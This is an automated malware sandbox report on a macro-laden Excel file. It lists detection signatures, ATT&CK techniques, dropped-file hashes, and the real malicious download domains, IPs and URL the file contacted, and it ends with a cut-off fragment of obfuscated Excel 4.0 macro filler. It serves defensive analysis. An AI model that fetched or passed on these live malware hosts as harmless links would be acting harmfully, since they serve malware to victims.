Play interactive tourEdit tour
Analysis Report documents-2112491607.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Machine Learning detection for dropped file | Show sources |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kautilyaclasses.com | 192.185.56.250 | true | false |
| unknown |
bodylanguage.santulan.co.in | 111.118.215.222 | true | true |
| unknown |
corwin-tommie06f.ru.com | 8.211.4.209 | true | false |
| unknown |
katelynn9506a.ru.com | 8.211.4.209 | true | false |
| unknown |
kullumanalitours.com | 103.211.216.55 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
true |
| unknown | |
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.211.216.55 | kullumanalitours.com | Seychelles | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false | |
192.185.56.250 | kautilyaclasses.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
8.211.4.209 | corwin-tommie06f.ru.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false | |
111.118.215.222 | bodylanguage.santulan.co.in | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383123 |
Start date: | 07.04.2021 |
Start time: | 09:14:09 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-2112491607.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/12@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
103.211.216.55 | Get hash | malicious | Browse |
| |
192.185.56.250 | Get hash | malicious | Browse |
| |
8.211.4.209 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
111.118.215.222 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
bodylanguage.santulan.co.in | Get hash | malicious | Browse |
| |
kullumanalitours.com | Get hash | malicious | Browse |
| |
corwin-tommie06f.ru.com | Get hash | malicious | Browse |
| |
kautilyaclasses.com | Get hash | malicious | Browse |
| |
katelynn9506a.ru.com | Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://bodylanguage.santulan.co.in/ds/index.html |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.489142053628293 |
Encrypted: | false |
SSDEEP: | 12:85QENcLgXg/XAlCPCHaXtB8XzB/XURvX+WnicvbRbDtZ3YilMMEpxRljK5TdJP9O:85JK/XTd6j0YeBDv3qYrNru/ |
MD5: | 9C40617F346B87D23DC5454B7267E33A |
SHA1: | B87124245ACDB8EDF4EE972366790CC463CDBDDC |
SHA-256: | 223CD23880148DA3DEC1729E43E7735385478231A1BDE95A0E89C438C420623B |
SHA-512: | 097B24FAE265EC38060C7B05B10025503D2E49FC3E099853E913841E42C6E7BB4AA0EE7EA6F39710C6533D49C3CAEA3E24E42A16D1F127587794E4CCCBE1D3E1 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.547087478186962 |
Encrypted: | false |
SSDEEP: | 24:8bz2/XTd6jFyD2nhe8WDv3qYdM7dD2bz2/XTd6jFyD2nhe8WDv3qYdM7dV:8+/XT0jFY2nhdYQh2+/XT0jFY2nhdYQ/ |
MD5: | FD2F42E72FB642FA79B3F38914DB4B03 |
SHA1: | 96D1AD382852122C29334DFB5CE89A13DD14C8F3 |
SHA-256: | 8C69F2F1A47257D91955C5E9AC888608AA6234EEECFEAD7BCEB4B268B747ECBA |
SHA-512: | 069397B0B527C31C843AAEBF778965D48E446F0958B536D57CE7C5DA68A801C90FA90699DFBFD1C68FCC93FB06EBFA5A6BE204BAA47FD089F4597C050A8073BB |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.745678829632436 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRzcOHZELRzcOHmxWKS9LRzcOHv:dj49Ll5ELlt9LlP |
MD5: | 153B80C9C6025C6926C8F0A15B781156 |
SHA1: | A4B5E632F8E2282BA31EF56938E23F0BAC5DAD1F |
SHA-256: | 1E02E4944F11BD25D085F2B96AECB9912DEBC942C411D1E85603DFFCF69E2F65 |
SHA-512: | 7EDD7295338EFC23F23A3B55F3AD1832A297701F58CB68AF080594D8C119BA3FBAB32BC55DCFBA231C65E40E5CA313A74217B2B8948F035ECA6979281E4165F4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.8821840433354 |
TrID: |
|
File name: | documents-2112491607.xlsm |
File size: | 96877 |
MD5: | cada6b07929cd03002206f65f547f383 |
SHA1: | e4b72830f1f320d711f60f540a8fe9340597238e |
SHA256: | b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860 |
SHA512: | 930c2ed9bf01b1c22189985f47800b11b2d116d5210a6f712f12ea25d7d4d52c165b7c9531d902487e341d9ebf35c4f3768ada1299b0ad9cab91d95f1b36fc15 |
SSDEEP: | 1536:4h1M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:4h1M4kra8Wz8jbzSn4BC6Qdkx60WMo |
File Content Preview: | PK..........!...`.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-2112491607.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(